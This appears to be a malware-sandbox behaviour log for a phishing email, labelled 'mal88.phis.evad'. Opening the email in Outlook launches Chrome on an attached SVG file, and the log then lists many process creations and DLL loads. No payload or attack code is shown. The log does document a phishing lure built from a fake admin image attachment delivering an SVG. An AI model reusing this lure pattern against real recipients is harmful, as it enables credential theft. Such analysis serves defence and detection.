              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6408_781836407
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6408_781836407
              Source: classification engineClassification label: mal88.phis.evad.winEML@28/15@24/104
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250318T0458380003-7148.etl
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\Attached_image+from+ADMIN@weareworkspace.com.eml"
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "C7C092BC-F5BA-4EAC-B301-6EE4C1945B50" "4DC11E76-292E-400D-89B7-9348BCE65614" "7148" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\T3CX17XI\2758881647.svg
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2188,i,1755252170124573955,2774768264017984902,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:3
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "C7C092BC-F5BA-4EAC-B301-6EE4C1945B50" "4DC11E76-292E-400D-89B7-9348BCE65614" "7148" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\T3CX17XI\2758881647.svg
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2188,i,1755252170124573955,2774768264017984902,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:3
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: unknownProcess created: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exe "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exe" -ServerName:microsoft.windowslive.mail.AppXfbjsbkxvprcgqg6q4c9jfr0pn3kv9x5s.mca
              Source: unknownProcess created: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exe "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exe" -ServerName:microsoft.windowslive.manageaccounts.AppXdbf3yp5apt3t7q877db3gnz5zqpf71zj.mca
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: apphelp.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: hxoutlook_app.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: vccorlib140_app.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: vcruntime140_1_app.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: vcruntime140_app.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msvcp140_app.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: microsoft.applications.telemetry.windows.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msoimm.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mso40uiimm.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mso30imm.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mso20imm.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: office.ui.xaml.core.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: office.ui.xaml.word.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mso98imm.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mso50imm.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mso20imm.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mso98imm.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: hxoutlook.model.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.storage.applicationdata.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: twinapi.appcore.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: wintypes.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: hxcomm.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: cryptsp.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.applicationmodel.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.globalization.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: bcp47langs.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: bcp47mrm.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: profapi.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.staterepositorycore.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.networking.connectivity.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.networking.hostname.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.energy.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: rmclient.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.storage.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: wldp.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: propsys.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: rometadata.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.system.diagnostics.telemetry.platformtelemetryclient.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: hxcommmodel.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: hxoutlook.view.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: office.ui.xaml.hxshared.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: hxoutlook.viewmodel.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: clipc.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: hxoutlook.resources.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: logoncli.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.ui.xaml.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: coremessaging.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: iertutil.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dcomp.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.ui.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windowmanagementapi.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: textinputframework.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: inputhost.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: coreuicomponents.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: coreuicomponents.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: ntmarta.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: uxtheme.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: urlmon.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: srvcli.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: netutils.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dxgi.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: d3d11.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mrmcorer.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: d3d10warp.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.staterepositoryclient.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dxcore.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: d2d1.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dwrite.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: textshaping.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.shell.servicehostbuilder.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: execmodelproxy.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: uiamanager.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.ui.core.textinput.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.ui.immersive.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dataexchange.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: cryptbase.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: userenv.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: profext.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: office.ui.xaml.hx.mail.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: threadpoolwinrt.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.graphics.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: twinapi.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: directmanipulation.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.system.remotedesktop.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: winsta.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.system.profile.systemid.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msxml6.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: wininet.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: sspicli.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: winhttp.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.system.profile.retailinfo.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mswsock.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: iphlpapi.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: winnsi.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: winrttracing.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dnsapi.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: rasadhlp.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: fwpuclnt.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: schannel.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.ui.xaml.controls.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: office.ui.xaml.hxcalendar.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windowscodecs.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: photometadatahandler.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: ploptin.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: mskeyprotect.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: ntasn1.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: ncrypt.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: ncryptsslp.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: msasn1.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: dpapi.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: rsaenh.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: gpapi.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: webservices.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: userdataaccountapis.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: userdataplatformhelperutil.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: windows.accountscontrol.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: xmllite.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: accountsrt.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: aphostclient.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: apphelp.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: hxoutlook.model.dll
